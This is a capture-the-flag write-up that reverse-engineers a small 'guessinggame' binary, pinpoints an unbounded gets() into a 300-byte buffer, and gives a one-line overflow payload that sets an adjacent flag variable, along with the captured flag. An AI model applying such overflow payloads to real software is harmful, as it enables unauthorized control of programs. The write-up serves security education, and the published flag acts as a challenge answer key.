# guessinggame

No one seems to be able to guess my favorite animal... Can you?

`nc chal.pctf.competitivecyber.club 9999`

## Solution

I brought it to IDA and here are the pseudocode generated from there that I looked at.
**main()**

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
puts("Hello there, friend! Can you guess my favorite animal?");
check("Hello there, friend! Can you guess my favorite animal?", argv);
return 0;
}
```

**check()**

```c
int check()
{
int result; // eax
char s2[8]; // [rsp+8h] [rbp-138h] BYREF
char s1[300]; // [rsp+10h] [rbp-130h] BYREF
int v3; // [rsp+13Ch] [rbp-4h]

strcpy(s2, "Giraffe");
v3 = 0;
printf("Input guess: ");
gets(s1);
if ( !strcmp(s1, s2) )
result = puts("That's not my favorite animal... I promise!");
else
result = puts("ERRR! Wrong!");
if ( v3 )
{
puts("I wasn't able to trick you...");
return outputFlag();
}
return result;
}
```

Analyzing this function, we can see that `v3` needs to be set to `1` for us to get the flag. But of course, there is no way for us to directly do that. But as we can see, the input is actually saved into `s1` with the buffer size of `300` and right after that is where `v3` is. So essentially, we can send a payload that has `300` bytes of data with `\x01` added to it.
```python
payload = f"{'A' * 0x12C}\x01"
```

If we send this payload, it overflows `s1` and sets `v3` to `1` which outputs that flag:

```
PCTF{1_l0v3_g1raff35_85036769}
```